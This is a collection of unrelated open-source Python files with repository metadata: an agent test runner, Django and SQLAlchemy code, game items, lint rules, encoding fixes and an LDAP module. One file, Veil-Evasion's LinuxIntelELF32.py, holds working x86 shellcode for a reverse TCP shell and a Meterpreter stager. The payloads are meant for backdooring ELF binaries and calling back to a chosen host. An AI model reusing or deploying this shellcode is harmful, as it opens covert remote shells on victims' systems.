# v.add_thing(a, (1, 1))
# t = gui.EnvTUI(v)
# t.mapImageNames({
# ag.Wall: '#',
# Dirt: '@',
# ag.Agent: 'V',
# })
# t.step(0)
# t.list_things(Dirt)
# t.step(4)
# if len(t.env.get_things(Dirt)) > 0:
# t.list_things(Dirt)
# else:
# print('All clean!')
#
# # Check to continue
# if input('Do you want to continue [y/N]? ') != 'y':
# exit(0)
# else:
# print('----------------------------------------')
#
# # Repeat, but put Agent on the Right
# print('Two Cells, Agent on Bottom:')
# v = VacuumEnvironment(3, 4)
# v.add_thing(Dirt(), (1, 1))
# v.add_thing(Dirt(), (1, 2))
# a = v2.HW2Agent()
# a = ag.TraceAgent(a)
# v.add_thing(a, (1, 2))
# t = gui.EnvTUI(v)
# t.mapImageNames({
# ag.Wall: '#',
# Dirt: '@',
# ag.Agent: 'V',
# })
# t.step(0)
# t.list_things(Dirt)
# t.step(4)
# if len(t.env.get_things(Dirt)) > 0:
# t.list_things(Dirt)
# else:
# print('All clean!')
#
# # Check to continue
# if input('Do you want to continue [y/N]? ') != 'y':
# exit(0)
# else:
# print('----------------------------------------')
def testVacuum(label, w=4, h=3,
dloc=[(1,1),(2,1)],
vloc=(1,1),
limit=6):
print(label)
v = VacuumEnvironment(w, h)
for loc in dloc:
v.add_thing(Dirt(), loc)
a = v2.HW2Agent()
a = ag.TraceAgent(a)
v.add_thing(a, vloc)
t = gui.EnvTUI(v)
t.mapImageNames({
ag.Wall: '#',
Dirt: '@',
ag.Agent: 'V',
})
t.step(0)
t.list_things(Dirt)
t.step(limit)
if len(t.env.get_things(Dirt)) > 0:
t.list_things(Dirt)
else:
print('All clean!')
# Check to continue
if input('Do you want to continue [Y/n]? ') == 'n':
exit(0)
else:
print('----------------------------------------')
testVacuum('Two Cells, Agent on Left:')
testVacuum('Two Cells, Agent on Right:', vloc=(2,1))
testVacuum('Two Cells, Agent on Top:', w=3, h=4,
dloc=[(1,1), (1,2)], vloc=(1,1) )
testVacuum('Two Cells, Agent on Bottom:', w=3, h=4,
dloc=[(1,1), (1,2)], vloc=(1,2) )
testVacuum('Five Cells, Agent on Left:', w=7, h=3,
dloc=[(2,1), (4,1)], vloc=(1,1), limit=12)
testVacuum('Five Cells, Agent near Right:', w=7, h=3,
dloc=[(2,1), (3,1)], vloc=(4,1), limit=12)
testVacuum('Five Cells, Agent on Top:', w=3, h=7,
dloc=[(1,2), (1,4)], vloc=(1,1), limit=12 )
testVacuum('Five Cells, Agent Near Bottom:', w=3, h=7,
dloc=[(1,2), (1,3)], vloc=(1,4), limit=12 )
testVacuum('5x4 Grid, Agent in Top Left:', w=7, h=6,
dloc=[(1,4), (2,2), (3, 3), (4,1), (5,2)],
vloc=(1,1), limit=46 )
testVacuum('5x4 Grid, Agent near Bottom Right:', w=7, h=6,
dloc=[(1,3), (2,2), (3, 4), (4,1), (5,2)],
vloc=(4, 3), limit=46 )
v = VacuumEnvironment(6, 3)
a = v2.HW2Agent()
a = ag.TraceAgent(a)
loc = v.random_location_inbounds()
v.add_thing(a, location=loc)
v.scatter_things(Dirt)
g = gui.EnvGUI(v, 'Vaccuum')
c = g.getCanvas()
c.mapImageNames({
ag.Wall: 'images/wall.jpg',
# Floor: 'images/floor.png',
Dirt: 'images/dirt.png',
ag.Agent: 'images/vacuum.png',
})
c.update()
g.mainloop()
|
austinban/aima-python
|
submissions/Porter/vacuum2Runner.py
|
Python
|
mit
| 6,343
| 0.006779
|
'''
Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
Copyright (C) 2013,2014, Joshua Pitts
License: GPLv3
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
See <http://www.gnu.org/licenses/> for a copy of the GNU General
Public License
Currently supports win32/64 PE and linux32/64 ELF only(intel architecture).
This program is to be used for only legal activities by IT security
professionals and researchers. Author not responsible for malicious
uses.
'''
import struct
import sys
class linux_elfI32_shellcode():
"""
Linux ELFIntel x32 shellcode class
"""
def __init__(self, HOST, PORT, e_entry, SUPPLIED_SHELLCODE=None):
#could take this out HOST/PORT and put into each shellcode function
self.HOST = HOST
self.PORT = PORT
self.e_entry = e_entry
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.shellcode = ""
self.stackpreserve = "\x90\x90\x60\x9c"
self.stackrestore = "\x9d\x61"
def pack_ip_addresses(self):
hostocts = []
if self.HOST is None:
print "This shellcode requires a HOST parameter -H"
sys.exit(1)
for i, octet in enumerate(self.HOST.split('.')):
hostocts.append(int(octet))
self.hostip = struct.pack('=BBBB', hostocts[0], hostocts[1],
hostocts[2], hostocts[3])
return self.hostip
def returnshellcode(self):
return self.shellcode
def reverse_shell_tcp(self, CavesPicked={}):
"""
Modified metasploit linux/x64/shell_reverse_tcp shellcode
to correctly fork the shellcode payload and contiue normal execution.
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
self.shellcode1 = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x07"
#will need to put resume execution shellcode here
self.shellcode1 += "\xbd"
self.shellcode1 += struct.pack("<I", self.e_entry)
self.shellcode1 += "\xff\xe5"
self.shellcode1 += ("\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68")
#HOST
self.shellcode1 += self.pack_ip_addresses()
self.shellcode1 += "\x68\x02\x00"
#PORT
self.shellcode1 += struct.pack('!H', self.PORT)
self.shellcode1 += ("\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"
"\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x52\x53\x89\xe1\xb0\x0b\xcd\x80")
self.shellcode = self.shellcode1
return (self.shellcode1)
def reverse_tcp_stager(self, CavesPicked={}):
"""
FOR USE WITH STAGER TCP PAYLOADS INCLUDING METERPRETER
Modified metasploit linux/x64/shell/reverse_tcp shellcode
to correctly fork the shellcode payload and contiue normal execution.
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
self.shellcode1 = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x07"
#will need to put resume execution shellcode here
self.shellcode1 += "\xbd"
self.shellcode1 += struct.pack("<I", self.e_entry)
self.shellcode1 += "\xff\xe5"
self.shellcode1 += ("\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66\x89\xe1\xcd\x80"
"\x97\x5b\x68")
#HOST
self.shellcode1 += self.pack_ip_addresses()
self.shellcode1 += "\x68\x02\x00"
#PORT
self.shellcode1 += struct.pack('!H', self.PORT)
self.shellcode1 += ("\x89\xe1\x6a"
"\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\xb2\x07\xb9\x00\x10"
"\x00\x00\x89\xe3\xc1\xeb\x0c\xc1\xe3\x0c\xb0\x7d\xcd\x80\x5b"
"\x89\xe1\x99\xb6\x0c\xb0\x03\xcd\x80\xff\xe1")
self.shellcode = self.shellcode1
return (self.shellcode1)
def user_supplied_shellcode(self, CavesPicked={}):
"""
For user with position independent shellcode from the user
"""
if self.SUPPLIED_SHELLCODE is None:
print "[!] User must provide shellcode for this module (-U)"
sys.exit(0)
else:
supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
self.shellcode1 = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x07"
#will need to put resume execution shellcode here
self.shellcode1 += "\xbd"
self.shellcode1 += struct.pack("<I", self.e_entry)
self.shellcode1 += "\xff\xe5"
self.shellcode1 += supplied_shellcode
self.shellcode = self.shellcode1
return (self.shellcode1)
|
codercold/Veil-Evasion
|
tools/backdoor/intel/LinuxIntelELF32.py
|
Python
|
gpl-3.0
| 5,166
| 0.00542
|
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cms', '0014_auto_20160404_1908'),
]
operations = [
migrations.AlterField(
model_name='cmsplugin',
name='position',
field=models.PositiveSmallIntegerField(default=0, verbose_name='position', editable=False),
),
]
|
rsalmaso/django-cms
|
cms/migrations/0015_auto_20160421_0000.py
|
Python
|
bsd-3-clause
| 391
| 0.002558
|
from . import font
from .indicator import Indicator, IndicatorOptions
from .airspeed import AirspeedIndicator
from .altitude import AltitudeIndicator
from .attitude import AttitudeIndicator
from .compass import CompassIndicator
from .pfd import PFD
from .joystick import Joystick
from . import base_test
|
rbmj/pyflightcontrol
|
pyflightcontrol/base/__init__.py
|
Python
|
apache-2.0
| 305
| 0
|
import src
import random
class Bomb(src.items.Item):
"""
ingame item to kill things and destroy stuff
"""
type = "Bomb"
name = "bomb"
description = "designed to explode"
usageInfo = """
The explosion will damage/destroy everything on the current tile or the container.
Activate it to trigger a exlosion.
"""
bolted = False
walkable = True
def __init__(self):
"""
initialise state
"""
super().__init__(display=src.canvas.displayChars.bomb)
def apply(self, character):
"""
handle a character trying to use this item
by exploding
Parameters:
character: the character trying to use this item
"""
character.addMessage("the bomb starts to fizzle")
event = src.events.RunCallbackEvent(
#src.gamestate.gamestate.tick+random.randint(1,4)+delay
src.gamestate.gamestate.tick+1
)
event.setCallback({"container": self, "method": "destroy"})
self.container.addEvent(event)
def destroy(self, generateScrap=True):
"""
destroy the item
Parameters:
generateScrap: flag to toggle leaving residue
"""
if not self.xPosition or not self.yPosition:
return
offsets = [(0,0),(1,0),(-1,0),(0,1),(0,-1)]
random.shuffle(offsets)
delay = 1
if isinstance(self.container,src.rooms.Room):
delay = 2
for offset in offsets[:-1]:
new = src.items.itemMap["Explosion"]()
self.container.addItem(new,(self.xPosition-offset[0],self.yPosition-offset[1],self.zPosition))
event = src.events.RunCallbackEvent(
src.gamestate.gamestate.tick + delay
)
event.setCallback({"container": new, "method": "explode"})
self.container.addEvent(event)
super().destroy(generateScrap=False)
src.items.addType(Bomb)
|
MarxMustermann/OfMiceAndMechs
|
src/itemFolder/military/bomb.py
|
Python
|
gpl-3.0
| 1,990
| 0.009045
|
from django.db import models
class Salary(models.Model):
id = models.AutoField(primary_key = True)
bh = models.CharField(max_length = 10)
xm = models.CharField(max_length = 12)
status = models.CharField(max_length = 8)
class Meta:
db_table = 'swan_salary'
def __str__(self):
return self.id
|
huaiping/pandora
|
salary/models.py
|
Python
|
mit
| 332
| 0.03012
|
import unittest
import serializer
__author__ = 'peter'
class SerializationTests(unittest.TestCase):
def test_serialize_single_key_value_pair(self):
input = [{ 'name': 'value' }]
expected_output = "name=value"
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_non_string_type(self):
input = [{ 'name': 5.0 }]
expected_output = "name=5.0"
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_single_key_multi_value(self):
input = [{ 'name': ['first', 'second']}]
expected_output = 'name={\r\n\tfirst\r\n\tsecond\r\n}'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_nested_key(self):
input = [{ 'name': [{'sub_name': 'derp'}]}]
expected_output = 'name={\r\n\tsub_name=derp\r\n}'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_array_of_kvps(self):
input = [{'name one': 'value one'},{'name two':'value two'}]
expected_output = 'name one=value one\r\nname two=value two'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_nested_array(self):
input = [{ 'name': [{'sub_name': 'derp'}, {'sub_name_2': 'derp2'}]}]
expected_output = 'name={\r\n\tsub_name=derp\r\n\tsub_name_2=derp2\r\n}'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_doubly_nested_key(self):
input = [{ 'name': [{'sub_name': 'derp'}, {'sub_name_2': [{'more_nesting':'a thing'}]}]}]
expected_output = 'name={\r\n\tsub_name=derp\r\n\tsub_name_2={\r\n\t\tmore_nesting=a thing\r\n\t}\r\n}'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
|
PeterDowdy/py-paradox-convert
|
tests/serialization_tests.py
|
Python
|
mit
| 2,040
| 0.007353
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
This file is part of XBMC Mega Pack Addon.
Copyright (C) 2014 Wolverine (xbmcmegapack@gmail.com)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program. If not, see http://www.gnu.org/licenses/gpl-3.0.html
"""
class Countries_Virgin_islands_us():
'''Class that manages this specific menu context.'''
def open(self, plugin, menu):
menu.add_xplugins(plugin.get_xplugins(dictionaries=["Channels",
"Events", "Live", "Movies", "Sports", "TVShows"],
countries=["Virgin Islands, U.S."]))
|
xbmcmegapack/plugin.video.megapack.dev
|
resources/lib/menus/home_countries_virgin_islands_us.py
|
Python
|
gpl-3.0
| 1,134
| 0.00265
|
# Copyright (c) 2013-2014 Will Thames <will@thames.id.au>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ansiblelint.rules import AnsibleLintRule
class GitHasVersionRule(AnsibleLintRule):
id = '401'
shortdesc = 'Git checkouts must contain explicit version'
description = (
'All version control checkouts must point to '
'an explicit commit or tag, not just ``latest``'
)
severity = 'MEDIUM'
tags = ['module', 'repeatability', 'ANSIBLE0004']
version_added = 'historic'
def matchtask(self, file, task):
return (task['action']['__ansible_module__'] == 'git' and
task['action'].get('version', 'HEAD') == 'HEAD')
|
willthames/ansible-lint
|
lib/ansiblelint/rules/GitHasVersionRule.py
|
Python
|
mit
| 1,699
| 0
|
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Collection of functions and classes to fix various encoding problems on
multiple platforms with python.
"""
from __future__ import print_function
import codecs
import locale
import os
import sys
# Prevents initializing multiple times.
_SYS_ARGV_PROCESSED = False
def complain(message):
"""If any exception occurs in this file, we'll probably try to print it
on stderr, which makes for frustrating debugging if stderr is directed
to our wrapper. So be paranoid about catching errors and reporting them
to sys.__stderr__, so that the user has a higher chance to see them.
"""
print(
isinstance(message, str) and message or repr(message),
file=sys.__stderr__)
def fix_default_encoding():
"""Forces utf8 solidly on all platforms.
By default python execution environment is lazy and defaults to ascii
encoding.
http://uucode.com/blog/2007/03/23/shut-up-you-dummy-7-bit-python/
"""
if sys.getdefaultencoding() == 'utf-8':
return False
# Regenerate setdefaultencoding.
reload(sys)
# Module 'sys' has no 'setdefaultencoding' member
# pylint: disable=no-member
sys.setdefaultencoding('utf-8')
for attr in dir(locale):
if attr[0:3] != 'LC_':
continue
aref = getattr(locale, attr)
try:
locale.setlocale(aref, '')
except locale.Error:
continue
try:
lang, _ = locale.getdefaultlocale()
except (TypeError, ValueError):
continue
if lang:
try:
locale.setlocale(aref, (lang, 'UTF-8'))
except locale.Error:
os.environ[attr] = lang + '.UTF-8'
try:
locale.setlocale(locale.LC_ALL, '')
except locale.Error:
pass
return True
###############################
# Windows specific
def fix_win_sys_argv(encoding):
"""Converts sys.argv to 'encoding' encoded string.
utf-8 is recommended.
Works around <http://bugs.python.org/issue2128>.
"""
global _SYS_ARGV_PROCESSED
if _SYS_ARGV_PROCESSED:
return False
if sys.version_info.major == 3:
_SYS_ARGV_PROCESSED = True
return True
# These types are available on linux but not Mac.
# pylint: disable=no-name-in-module,F0401
from ctypes import byref, c_int, POINTER, windll, WINFUNCTYPE
from ctypes.wintypes import LPCWSTR, LPWSTR
# <http://msdn.microsoft.com/en-us/library/ms683156.aspx>
GetCommandLineW = WINFUNCTYPE(LPWSTR)(('GetCommandLineW', windll.kernel32))
# <http://msdn.microsoft.com/en-us/library/bb776391.aspx>
CommandLineToArgvW = WINFUNCTYPE(POINTER(LPWSTR), LPCWSTR, POINTER(c_int))(
('CommandLineToArgvW', windll.shell32))
argc = c_int(0)
argv_unicode = CommandLineToArgvW(GetCommandLineW(), byref(argc))
argv = [
argv_unicode[i].encode(encoding, 'replace') for i in range(0, argc.value)
]
if not hasattr(sys, 'frozen'):
# If this is an executable produced by py2exe or bbfreeze, then it
# will have been invoked directly. Otherwise, unicode_argv[0] is the
# Python interpreter, so skip that.
argv = argv[1:]
# Also skip option arguments to the Python interpreter.
while len(argv) > 0:
arg = argv[0]
if not arg.startswith(b'-') or arg == b'-':
break
argv = argv[1:]
if arg == u'-m':
# sys.argv[0] should really be the absolute path of the
# module source, but never mind.
break
if arg == u'-c':
argv[0] = u'-c'
break
sys.argv = argv
_SYS_ARGV_PROCESSED = True
return True
def fix_win_codec():
"""Works around <http://bugs.python.org/issue6058>."""
# <http://msdn.microsoft.com/en-us/library/dd317756.aspx>
try:
codecs.lookup('cp65001')
return False
except LookupError:
codecs.register(
lambda name: name == 'cp65001' and codecs.lookup('utf-8') or None)
return True
class WinUnicodeOutputBase(object):
"""Base class to adapt sys.stdout or sys.stderr to behave correctly on
Windows.
Setting encoding to utf-8 is recommended.
"""
def __init__(self, fileno, name, encoding):
# Corresponding file handle.
self._fileno = fileno
self.encoding = encoding
self.name = name
self.closed = False
self.softspace = False
self.mode = 'w'
@staticmethod
def isatty():
return False
def close(self):
# Don't really close the handle, that would only cause problems.
self.closed = True
def fileno(self):
return self._fileno
def flush(self):
raise NotImplementedError()
def write(self, text):
raise NotImplementedError()
def writelines(self, lines):
try:
for line in lines:
self.write(line)
except Exception as e:
complain('%s.writelines: %r' % (self.name, e))
raise
class WinUnicodeConsoleOutput(WinUnicodeOutputBase):
"""Output adapter to a Windows Console.
Understands how to use the win32 console API.
"""
def __init__(self, console_handle, fileno, stream_name, encoding):
super(WinUnicodeConsoleOutput, self).__init__(
fileno, '<Unicode console %s>' % stream_name, encoding)
# Handle to use for WriteConsoleW
self._console_handle = console_handle
# Loads the necessary function.
# These types are available on linux but not Mac.
# pylint: disable=no-name-in-module,F0401
from ctypes import byref, GetLastError, POINTER, windll, WINFUNCTYPE
from ctypes.wintypes import BOOL, DWORD, HANDLE, LPWSTR
from ctypes.wintypes import LPVOID # pylint: disable=no-name-in-module
self._DWORD = DWORD
self._byref = byref
# <http://msdn.microsoft.com/en-us/library/ms687401.aspx>
self._WriteConsoleW = WINFUNCTYPE(
BOOL, HANDLE, LPWSTR, DWORD, POINTER(DWORD), LPVOID)(
('WriteConsoleW', windll.kernel32))
self._GetLastError = GetLastError
def flush(self):
# No need to flush the console since it's immediate.
pass
def write(self, text):
try:
if sys.version_info.major == 2 and not isinstance(text, unicode):
# Convert to unicode.
text = str(text).decode(self.encoding, 'replace')
elif sys.version_info.major == 3 and isinstance(text, bytes):
# Bytestrings need to be decoded to a string before being passed to
# Windows.
text = text.decode(self.encoding, 'replace')
remaining = len(text)
while remaining > 0:
n = self._DWORD(0)
# There is a shorter-than-documented limitation on the length of the
# string passed to WriteConsoleW. See
# <http://tahoe-lafs.org/trac/tahoe-lafs/ticket/1232>.
retval = self._WriteConsoleW(
self._console_handle, text,
min(remaining, 10000),
self._byref(n), None)
if retval == 0 or n.value == 0:
raise IOError(
'WriteConsoleW returned %r, n.value = %r, last error = %r' % (
retval, n.value, self._GetLastError()))
remaining -= n.value
if not remaining:
break
text = text[int(n.value):]
except Exception as e:
complain('%s.write: %r' % (self.name, e))
raise
class WinUnicodeOutput(WinUnicodeOutputBase):
"""Output adaptor to a file output on Windows.
If the standard FileWrite function is used, it will be encoded in the current
code page. WriteConsoleW() permits writing any character.
"""
def __init__(self, stream, fileno, encoding):
super(WinUnicodeOutput, self).__init__(
fileno, '<Unicode redirected %s>' % stream.name, encoding)
# Output stream
self._stream = stream
# Flush right now.
self.flush()
def flush(self):
try:
self._stream.flush()
except Exception as e:
complain('%s.flush: %r from %r' % (self.name, e, self._stream))
raise
def write(self, text):
try:
if sys.version_info.major == 2 and isinstance(text, unicode):
# Replace characters that cannot be printed instead of failing.
text = text.encode(self.encoding, 'replace')
if sys.version_info.major == 3 and isinstance(text, bytes):
# Replace characters that cannot be printed instead of failing.
text = text.decode(self.encoding, 'replace')
self._stream.write(text)
except Exception as e:
complain('%s.write: %r' % (self.name, e))
raise
def win_handle_is_a_console(handle):
"""Returns True if a Windows file handle is a handle to a console."""
# These types are available on linux but not Mac.
# pylint: disable=no-name-in-module,F0401
from ctypes import byref, POINTER, windll, WINFUNCTYPE
from ctypes.wintypes import BOOL, DWORD, HANDLE
FILE_TYPE_CHAR = 0x0002
FILE_TYPE_REMOTE = 0x8000
INVALID_HANDLE_VALUE = DWORD(-1).value
# <http://msdn.microsoft.com/en-us/library/ms683167.aspx>
GetConsoleMode = WINFUNCTYPE(BOOL, HANDLE, POINTER(DWORD))(
('GetConsoleMode', windll.kernel32))
# <http://msdn.microsoft.com/en-us/library/aa364960.aspx>
GetFileType = WINFUNCTYPE(DWORD, DWORD)(('GetFileType', windll.kernel32))
# GetStdHandle returns INVALID_HANDLE_VALUE, NULL, or a valid handle.
if handle == INVALID_HANDLE_VALUE or handle is None:
return False
return (
(GetFileType(handle) & ~FILE_TYPE_REMOTE) == FILE_TYPE_CHAR and
GetConsoleMode(handle, byref(DWORD())))
def win_get_unicode_stream(stream, excepted_fileno, output_handle, encoding):
"""Returns a unicode-compatible stream.
This function will return a direct-Console writing object only if:
- the file number is the expected console file number
- the handle the expected file handle
- the 'real' handle is in fact a handle to a console.
"""
old_fileno = getattr(stream, 'fileno', lambda: None)()
if old_fileno == excepted_fileno:
# These types are available on linux but not Mac.
# pylint: disable=no-name-in-module,F0401
from ctypes import windll, WINFUNCTYPE
from ctypes.wintypes import DWORD, HANDLE
# <http://msdn.microsoft.com/en-us/library/ms683231.aspx>
GetStdHandle = WINFUNCTYPE(HANDLE, DWORD)(('GetStdHandle', windll.kernel32))
real_output_handle = GetStdHandle(DWORD(output_handle))
if win_handle_is_a_console(real_output_handle):
# It's a console.
return WinUnicodeConsoleOutput(
real_output_handle, old_fileno, stream.name, encoding)
# It's something else. Create an auto-encoding stream.
return WinUnicodeOutput(stream, old_fileno, encoding)
def fix_win_console(encoding):
"""Makes Unicode console output work independently of the current code page.
This also fixes <http://bugs.python.org/issue1602>.
Credit to Michael Kaplan
<http://blogs.msdn.com/b/michkap/archive/2010/04/07/9989346.aspx> and
TZOmegaTZIOY
<http://stackoverflow.com/questions/878972/windows-cmd-encoding-change-causes-python-crash/1432462#1432462>.
"""
if (isinstance(sys.stdout, WinUnicodeOutputBase) or
isinstance(sys.stderr, WinUnicodeOutputBase)):
return False
try:
# SetConsoleCP and SetConsoleOutputCP could be used to change the code page
# but it's not really useful since the code here is using WriteConsoleW().
# Also, changing the code page is 'permanent' to the console and needs to be
# reverted manually.
# In practice one needs to set the console font to a TTF font to be able to
# see all the characters but it failed for me in practice. In any case, it
# won't throw any exception when printing, which is the important part.
# -11 and -12 are defined in stdio.h
sys.stdout = win_get_unicode_stream(sys.stdout, 1, -11, encoding)
sys.stderr = win_get_unicode_stream(sys.stderr, 2, -12, encoding)
# TODO(maruel): Do sys.stdin with ReadConsoleW(). Albeit the limitation is
# "It doesn't appear to be possible to read Unicode characters in UTF-8
# mode" and this appears to be a limitation of cmd.exe.
except Exception as e:
complain('exception %r while fixing up sys.stdout and sys.stderr' % e)
return True
def fix_encoding():
"""Fixes various encoding problems on all platforms.
Should be called at the very beginning of the process.
"""
ret = True
if sys.platform == 'win32':
ret &= fix_win_codec()
ret &= fix_default_encoding()
if sys.platform == 'win32':
encoding = sys.getdefaultencoding()
if sys.version_info[0] == 2:
ret &= fix_win_sys_argv(encoding)
ret &= fix_win_console(encoding)
return ret
|
luci/luci-py
|
client/third_party/depot_tools/fix_encoding.py
|
Python
|
apache-2.0
| 12,497
| 0.009842
|
import sqlalchemy.pool
import time
import math
class SAAutoPool(sqlalchemy.pool.QueuePool):
""" A pool class similar to QueuePool but rather than holding some
minimum number of connections open makes an estimate of how many
connections are needed.
The goal is that new connections should be opened at most once every few
seconds and shouldn't create so many that there will be many idle. """
def __init__(self, creator, pool_size=20, open_interval=5, **kw):
""" Create a new SAAutoPool.
pool_size is passed to to the QueuePool parent. You shouldn't need
to adjust this, it's more to provide a hard maximum on the number of
connections.
open_interval is the target interval between the opening of new
connections, in seconds. The default 5 means to aim for opening a
new connection on average once every 5 seconds. """
super(SAAutoPool, self).__init__(creator, pool_size=pool_size, **kw)
self.open_interval = open_interval
# Start at an expected 5 connections, to avoid large churn on
# startup. The 5 is based on the default 5 in QueuePool.
self.mean = 5
self.rate = 1
self.last_ts = self._get_time()
self.qsize = 1
self.next_update = 0
self.decay_rate = math.log(0.5)/60
def _get_time(self):
# Internal function to allow overriding, primarily for testing.
return time.time()
def _update_qsize(self, ts, checkout):
# An weighted average, where one minute ago counts half as much.
w = math.exp( (ts-self.last_ts)*self.decay_rate )
self.last_ts = ts
self.rate = w*self.rate
if checkout:
self.rate += (1-math.exp(self.decay_rate))
level = self.checkedout()
self.mean = w*self.mean + (1-w)*level
if ts > self.next_update:
# The idea is that if we know there are 20 checkouts per second,
# then we want to aim that only 5% of checkouts lead to an
# actual new connection. The number of actual connections is
# tracked by the mean, so by using the inverse CDF of the
# Poisson distribtion we can calculate how many connections we
# actually need to acheive this target.
self.qsize = self._inv_cdf_poisson( 1-(1.0/max(2, self.open_interval*self.rate)), self.mean )
self.next_update = ts+1
@staticmethod
def _inv_cdf_poisson(p, mu):
""" Stupid simple inverse poisson distribution. Actually 1 too high, but that's OK here """
x = 0
n = 0
while x < p:
x += math.exp(-mu)*math.pow(mu, n)/math.factorial(n)
n += 1
return n
def _do_get(self):
self._update_qsize(self._get_time(), True)
conn = super(SAAutoPool, self)._do_get()
# print ">>> last_ts=%.1f ci=%d co=%d=%d-%d+%d qsize=%d" % (self.last_ts, self.checkedin(), self.checkedout(), self._pool.maxsize, self._pool.qsize(), self._overflow, self.qsize)
return conn
def _do_return_conn(self, conn):
self._update_qsize(self._get_time(), False)
super(SAAutoPool, self)._do_return_conn(conn)
# If there's a connection in the pool and the total connections exceeds the limit, close it.
if self.checkedin() > 0 and self.qsize < self.checkedin() + self.checkedout():
conn = self._pool.get()
conn.close()
# This is needed so the connection level count remains accurate
self._dec_overflow()
# print "<<< last_ts=%.1f ci=%d co=%d=%d-%d+%d qsize=%d" % (self.last_ts, self.checkedin(), self.checkedout(), self._pool.maxsize, self._pool.qsize(), self._overflow, self.qsize)
|
kleptog/saautopool
|
saautopool.py
|
Python
|
mit
| 3,786
| 0.002905
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# Copyright (c) 2017 Stephen Bunn (stephen@bunn.io)
# GNU GPLv3 <https://www.gnu.org/licenses/gpl-3.0.en.html>
from ._common import *
from .rethinkdb import RethinkDBPipe
from .mongodb import MongoDBPipe
|
ritashugisha/neat
|
neat/pipe/__init__.py
|
Python
|
gpl-3.0
| 255
| 0
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module provides access to LDAP servers, along with some basic functionality required for Hue and
User Admin to work seamlessly with LDAP.
"""
import ldap
import ldap.filter
import logging
import re
from django.contrib.auth.models import User
import desktop.conf
from desktop.lib.python_util import CaseInsensitiveDict
LOG = logging.getLogger(__name__)
CACHED_LDAP_CONN = None
class LdapBindException(Exception):
pass
class LdapSearchException(Exception):
pass
def get_connection_from_server(server=None):
ldap_servers = desktop.conf.LDAP.LDAP_SERVERS.get()
if server and ldap_servers:
ldap_config = ldap_servers[server]
else:
ldap_config = desktop.conf.LDAP
return get_connection(ldap_config)
def get_connection(ldap_config):
global CACHED_LDAP_CONN
if CACHED_LDAP_CONN is not None:
return CACHED_LDAP_CONN
ldap_url = ldap_config.LDAP_URL.get()
username = ldap_config.BIND_DN.get()
password = desktop.conf.get_ldap_bind_password(ldap_config)
ldap_cert = ldap_config.LDAP_CERT.get()
search_bind_authentication = ldap_config.SEARCH_BIND_AUTHENTICATION.get()
if ldap_url is None:
raise Exception('No LDAP URL was specified')
if search_bind_authentication:
